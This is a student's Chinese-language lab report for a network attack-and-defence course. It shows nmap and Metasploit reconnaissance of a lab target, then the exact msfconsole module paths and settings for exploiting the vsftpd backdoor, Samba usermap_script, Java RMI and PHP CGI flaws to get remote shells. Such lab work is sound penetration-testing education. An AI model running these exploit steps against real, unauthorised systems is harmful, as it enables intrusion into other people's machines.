首页 > 其他分享 >20222408 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222408 2024-2025-1 《网络与系统攻防技术》实验六实验报告

时间:2024-11-17 22:41:44浏览次数:1  
标签:漏洞 端口 2024 2025 exploit 172.16 20222408 靶机 输入

1.实验内容

1.1实验要求

(1)掌握metasploit、nmap的用法。
(2)学习前期渗透的方法。
(3)利用4个漏洞,实现对靶机的攻击。

1.2学习内容

(1)metasploit的用法:可以简单总结为“Search-Use-Show-Set-Exploit/run”。
(2)四种漏洞的原理。
a.Vsftpd源码包后门漏洞:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
b.SambaMS-RPC Shell命令注入漏洞:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
c.Java RMI SERVER命令执行漏洞:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
d.PHP CGI参数执行注入漏洞:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

2.实验过程

2.1前期渗透

在靶机中使用ipconfig得到ip地址为172.16.218.247。
alt text
在kali中打开msfconsole,输入以下命令。
search arp_sweep
use 0
set RHOSTS 172.16.218.0/24
run
扫描到了靶机。
alt text
可以在命令行中输入nmap -p 1-2048 172.16.218.247查看靶机开放的端口。
alt text
还可以在命令行中输入nmap -script=vuln 172.16.218.247对靶机的漏洞进行扫描。这个靶机被设置得非常不安全,有很多漏洞。截取一部分的结果,发现21端口有vsFTPd漏洞,1099端口有RMI registry default configuration remote code execution漏洞,大部分端口都开放着。
alt text
alt text
alt text

2.2Vsftpd源码包后门漏洞(21端口)

在msfconsole中输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 172.16.218.247
run
再输入uname -a,pwd,id命令,可以看到已经获取靶机的shell,攻击成功。
alt text

2.3SambaMS-RPC Shell命令注入漏洞(端口139)

在msfconsole中输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 172.16.218.247
exploit
再输入uname -a命令,可以看到已经获取靶机的shell,攻击成功。
alt text

2.4Java RMI SERVER命令执行漏洞(1099端口)

在前期渗透中已经得知1099端口开放,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 172.16.218.247
exploit
shell
输入命令whoami,得到结果root,说明攻击成功。
alt text

2.5PHP CGI参数执行注入漏洞(80端口)

在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 172.16.218.247
exploit
shell
可以执行命令,说明攻击成功。
alt text

3.问题及解决方案

  • 问题1:ifconfig后发现kali和靶机不在一个网段。
  • 问题1解决方案:根据之前做实验的经验,关机,设置靶机的网络适配器为桥接模式,再启动就解决了问题。

4.学习感悟、思考等

在这次渗透测试实验中,我更深刻地体会到了掌握和利用专业安全工具的重要性。Metasploit和Nmap作为两款强大的安全工具,它们在前期信息收集、端口扫描以及漏洞探测等方面发挥了关键作用。通过实际操作这些工具,我们可以在面对不同类型的漏洞时,迅速找到对应的攻击模块并成功利用。
这次实验也让我深刻反思了网络安全防护的严峻性。虽然实验中遇到的这些漏洞基本上都已经被解决,但在实际环境中也会不断产生新的安全威胁,任何系统或应用都可能存在潜在的安全风险,必须时刻保持警惕并采取有效的防护措施。

参考资料

标签:漏洞,端口,2024,2025,exploit,172.16,20222408,靶机,输入
From: https://www.cnblogs.com/20222408msy/p/18551305

相关文章

  • 学期2024-2025-1 学号20241424 《计算机基础与程序设计》第8周学习总结
    学期2024-2025-1学号20241424《计算机基础与程序设计》第8周学习总结作业信息|这个作业属于2024-2025-1-计算机基础与程序设计||-- |-- ||这个作业要求在[2024-2025-1计算机基础与程序设计第8周作业](https://www.cnblogs.com/rocedu/p/9577842.html#WEEK08||这个作业的目......
  • 20222326 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    一、实验内容实验内容:掌握metasploit的用法,下载完官方靶机Metasploitable2后,可以通过前期渗透、Vsftpd源码包后门漏洞(21端口)、SambaMS-RPCShell命令注入漏洞(端口139)、JavaRMISERVER命令执行漏洞(1099端口)和PHPCGI参数执行注入漏洞(80端口)来具体实践,掌握metasploit,本周学习内......
  • 2024-2025-1 20241406 刘书含《计算机基础与程序设计》第8周学习总结
    2024-2025-120241406《计算机基础与程序设计》第8周学习总结这个作业属于哪个课程 2024-2025-1-计算机基础与程序设计这个作业要求在哪里 如2024-2025-1计算机基础与程序设计第八周作业这个作业的目标 功能设计与面向对象设计>面向对象设计过程面向对象语言三要素汇编、编......
  • [考试记录] 2024.11.16 noip模拟赛14
    T1字符串构造机考虑将一个LCP条件拆分成两个,一个是相等的部分,使用并查集维护,另一个是不等的部分,两个串末尾的字符一定不相等,随便那啥维护。对于非法情况就是在同一个相等联通块内有不相等的条件。然后考虑从前往后贪心即可。#include<bits/stdc++.h>usingnamespacestd;#d......
  • MLLM_20241117
    Paper1题目:INFERENCEOPTIMALVLMSNEEDONLYONEVISUALTOKENBUTLARGERMODELS作者团队:KevinY.Li,SachinGoyal,JoãoD.Semedo,J.ZicoKolter(CMU)链接:https://arxiv.org/abs/2411.033121.论文试图解决什么问题?是否是一个新问题?论文试图解决VLMs推理阶......
  • 2024-2025-1 20241328 《计算机基础与程序设计》第八周学习总结
    2024-2025-120241328《计算机基础与程序设计》第八周学习总结作业信息课程2024-2025-1-计算机基础与程序设计作业要求2024-2025-1计算机基础与程序设计第八周作业作业目标功能设计与面向对象设计,面向对象设计过程,面向对象语言三要素,汇编、编译、解释、执行作......
  • 2024-2025-1 20241304 《计算机基础与程序设计》第8周学习总结
    2024-2025-120241304《计算机基础与程序设计》第8周学习总结作业信息|这个作业属于哪个课程|<2024-2025-1-计算机基础与程序设计)|>|-- |-- ||这个作业要求在哪里|<作业要求的链接>(如2024-2025-1计算机基础与程序设计第八周作业)||这个作业的目标|<学习目标功能设计与面......
  • 2024-2025-1 20241325 王向龙 《计算机程序与设计》第八周学习总结
    2024-2025-120241325《计算机基础与程序设计》第8周学习总结这个作业属于哪个课程2024-2025-1-计算机基础与程序设计这个作业要求在哪里如2024-2025-1计算机基础与程序设计第八周作业这个作业的目标功能设计与面向对象设计>面向对象设计过程面向对象语言三要素......
  • scratch绘制八个正方形 2024年9月scratch四级真题 中国电子学会 图形化编程 scratch四
    目录scratch绘制八个正方形一、题目要求1、准备工作2、功能实现二、案例分析1、角色分析2、背景分析3、前期准备三、解题思路1、思路分析2、详细过程四、程序编写五、考点分析六、推荐资料1、入门基础2、蓝桥杯比赛3、考级资料4、视频课程5、python资料s......
  • NOIP2024加赛5
    暴力操作(opt)拜谢丁真首先题目有一个很明显的性质:我们肯定只会对前\(\cfrac{n+1}{2}\)个数进行操作使它变小。最后的答案很明显没看出来具有二分答案的性质,考虑怎么check。实则就是要判断前\(\cfrac{n+1}{2}\)个数是否都能\(\lemid\)。我们可以方便的找出\(a_i\)变......